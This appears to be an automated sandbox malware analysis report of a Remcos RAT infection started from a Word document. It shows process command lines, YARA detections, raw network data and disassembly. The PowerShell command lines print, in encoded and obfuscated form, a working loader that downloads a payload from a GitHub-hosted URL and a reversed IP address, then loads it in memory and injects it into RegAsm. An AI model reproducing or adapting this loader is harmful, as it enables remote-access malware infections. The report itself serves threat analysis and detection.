                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                          Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                          Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                          Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                          Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                          Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:08:58:11
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                          Imagebase:0x13fa60000
                                                                                                                          File size:1'423'704 bytes
                                                                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:2
                                                                                                                          Start time:08:58:12
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:543'304 bytes
                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:08:58:16
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS"
                                                                                                                          Imagebase:0x7c0000
                                                                                                                          File size:141'824 bytes
                                                                                                                          MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:6
                                                                                                                          Start time:08:58:16
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                          Imagebase:0xda0000
                                                                                                                          File size:427'008 bytes
                                                                                                                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:08:58:17
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))"
                                                                                                                          Imagebase:0xda0000
                                                                                                                          File size:427'008 bytes
                                                                                                                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:9
                                                                                                                          Start time:08:58:24
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                          Imagebase:0xa10000
                                                                                                                          File size:64'704 bytes
                                                                                                                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.886651440.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.886651440.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:11
                                                                                                                          Start time:08:58:28
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ptdercjwijh"
                                                                                                                          Imagebase:0xa10000
                                                                                                                          File size:64'704 bytes
                                                                                                                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:12
                                                                                                                          Start time:08:58:28
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rvipsuupwrzfhg"
                                                                                                                          Imagebase:0xa10000
                                                                                                                          File size:64'704 bytes
                                                                                                                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:13
                                                                                                                          Start time:08:58:28
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cpnhtnerszrskmtpxa"
                                                                                                                          Imagebase:0xa10000
                                                                                                                          File size:64'704 bytes
                                                                                                                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:14
                                                                                                                          Start time:08:58:37
                                                                                                                          Start date:05/10/2024
                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:543'304 bytes
                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Reset < >
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.384158795.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_1ed000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0147825a83bf559d4759c2e3851468254f2dcb340f887871a3c7c09bae6a6b74
                                                                                                                            • Instruction ID: 9bfbf19c4e706dd42baadcd7d612b776264f8d6c2157c7524ffecae1c99c3985
                                                                                                                            • Opcode Fuzzy Hash: 0147825a83bf559d4759c2e3851468254f2dcb340f887871a3c7c09bae6a6b74
                                                                                                                            • Instruction Fuzzy Hash: 3301A271504780AAE7245E2AEC84B6BFFD8EF41764F2C841AFC494B286C779D845CAB1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.384158795.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_1ed000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1510026baac4ae054f766716b4af4d1e83ffe133435bb7634b4cdbb83aef3dd9
                                                                                                                            • Instruction ID: 65f6d3bb9d877581252df48af415bd99ff7c274f5bc90c3f366b23883c91b778
                                                                                                                            • Opcode Fuzzy Hash: 1510026baac4ae054f766716b4af4d1e83ffe133435bb7634b4cdbb83aef3dd9
                                                                                                                            • Instruction Fuzzy Hash: 3501E96140E7C09FD7128B259C94B66BFB4DF53624F1D81DBE8888F2A7C2699848C772

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:9.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:15
                                                                                                                            Total number of Limit Nodes:2
                                                                                                                            execution_graph 10970 268540 10971 268590 WriteProcessMemory 10970->10971 10972 268588 10970->10972 10973 2685cb 10971->10973 10972->10971 10974 2683c8 10975 268414 Wow64SetThreadContext 10974->10975 10976 26840a 10974->10976 10977 268442 10975->10977 10976->10975 10978 268188 10979 268203 CreateProcessW 10978->10979 10981 2682e1 10979->10981 10982 267758 10983 267766 10982->10983 10984 2676a8 ResumeThread 10983->10984 10985 2670d1 10983->10985 10984->10985

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 392e00-392e25 1 392e2b-392e30 0->1 2 392fe3-39302f 0->2 3 392e48-392e4c 1->3 4 392e32-392e38 1->4 12 39303f 2->12 13 393031-39303d 2->13 7 392f93-392f9d 3->7 8 392e52-392e54 3->8 5 392e3a 4->5 6 392e3c-392e46 4->6 5->3 6->3 14 392fab-392fb1 7->14 15 392f9f-392fa8 7->15 10 392e64 8->10 11 392e56-392e62 8->11 20 392e66-392e68 10->20 11->20 19 393041-393043 12->19 13->19 16 392fb3-392fb5 14->16 17 392fb7-392fc3 14->17 21 392fc5-392fe0 16->21 17->21 22 393049-393061 19->22 23 3930ec-3930f6 19->23 20->7 24 392e6e-392e75 20->24 36 39313c-393184 22->36 37 393067-39306c 22->37 27 3930f8-3930fe 23->27 28 393101-393107 23->28 24->2 26 392e7b-392e80 24->26 33 392e98-392ea6 26->33 34 392e82-392e88 26->34 29 393109-39310b 28->29 30 39310d-393119 28->30 35 39311b-393139 29->35 30->35 33->7 46 392eac-392ec9 33->46 38 392e8a 34->38 39 392e8c-392e96 34->39 52 393194 36->52 53 393186-393192 36->53 43 39306e-393074 37->43 44 393084-39308e 37->44 38->33 39->33 49 393078-393082 43->49 50 393076 43->50 51 393093-3930a4 44->51 46->7 75 392ecf-392ef4 46->75 49->44 50->44 51->36 63 3930aa-3930af 51->63 57 393196-393198 52->57 53->57 59 39319e-3931a0 57->59 60 393257-393261 57->60 61 3931ba-3931c3 59->61 62 3931a2-3931a8 59->62 64 39326f-393275 60->64 65 393263-39326c 60->65 69 3931c5 61->69 70 3931c7-3931d6 61->70 67 3931aa 62->67 68 3931ac-3931b8 62->68 71 3930b1-3930b7 63->71 72 3930c7-3930e9 63->72 73 39327b-393287 64->73 74 393277-393279 64->74 67->61 68->61 69->70 84 3931d8-3931e3 70->84 85 3931e5-39322b 70->85 76 3930b9 71->76 77 3930bb-3930c5 71->77 78 393289-3932a5 73->78 74->78 75->7 93 392efa-392efc 75->93 76->72 77->72 88 39324b-393254 84->88 109 39322d 85->109 110 393237-393241 85->110 94 392efe-392f04 93->94 95 392f16-392f21 93->95 96 392f08-392f14 94->96 97 392f06 94->97 102 392f39-392f90 95->102 103 392f23-392f29 95->103 96->95 97->95 104 392f2b 103->104 105 392f2d-392f2f 103->105 104->102 105->102 112 393232 109->112 111 393243 110->111 110->112 111->88 112->110
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'p$4'p$$p$$p$$p$$p
                                                                                                                            • API String ID: 0-3219492093
                                                                                                                            • Opcode ID: 0952295711ea1b0da591b4528966605f8ae2710bb05fbf9e341de736389429bc
                                                                                                                            • Instruction ID: 3b94174b6add69f3d34ff77c19eb3370ce022230b711aaefb42a75dc92935297
                                                                                                                            • Opcode Fuzzy Hash: 0952295711ea1b0da591b4528966605f8ae2710bb05fbf9e341de736389429bc
                                                                                                                            • Instruction Fuzzy Hash: 0DD10635B082019FCB16DB68D850A6BFBF6AFC5310B29847BD946CB252DB31CD46C7A1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 113 3909e5-3909e8 114 3909ea-3909ec 113->114 115 3909ee-3909f6 113->115 114->115 116 3909f8-3909fe 115->116 117 390a0e-390a12 115->117 118 390a00 116->118 119 390a02-390a0c 116->119 120 390a18-390a1c 117->120 121 390b73-390b7d 117->121 118->117 119->117 124 390a2f 120->124 125 390a1e-390a2d 120->125 122 390b8b-390b91 121->122 123 390b7f-390b88 121->123 127 390b93-390b95 122->127 128 390b97-390ba3 122->128 129 390a31-390a33 124->129 125->129 130 390ba5-390bc3 127->130 128->130 129->121 131 390a39-390a59 129->131 137 390a78 131->137 138 390a5b-390a76 131->138 139 390a7a-390a7c 137->139 138->139 139->121 141 390a82-390a84 139->141 142 390a94 141->142 143 390a86-390a92 141->143 145 390a96-390a98 142->145 143->145 145->121 146 390a9e-390abe 145->146 149 390ac0-390ac6 146->149 150 390ad6-390ada 146->150 151 390ac8 149->151 152 390aca-390acc 149->152 153 390adc-390ae2 150->153 154 390af4-390af8 150->154 151->150 152->150 155 390ae4 153->155 156 390ae6-390af2 153->156 157 390aff-390b01 154->157 155->154 156->154 158 390b19-390b70 157->158 159 390b03-390b09 157->159 161 390b0b 159->161 162 390b0d-390b0f 159->162 161->158 162->158
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'p$4'p$$p$$p$$p
                                                                                                                            • API String ID: 0-2334450948
                                                                                                                            • Opcode ID: 86a362ee9108175fdb4f920c69504c1a5847f682102bb205d1977e915295c3c1
                                                                                                                            • Instruction ID: 869ef9d90bf2110adb03170f56d1fa67993bda280b362335c0184baf83bcac06
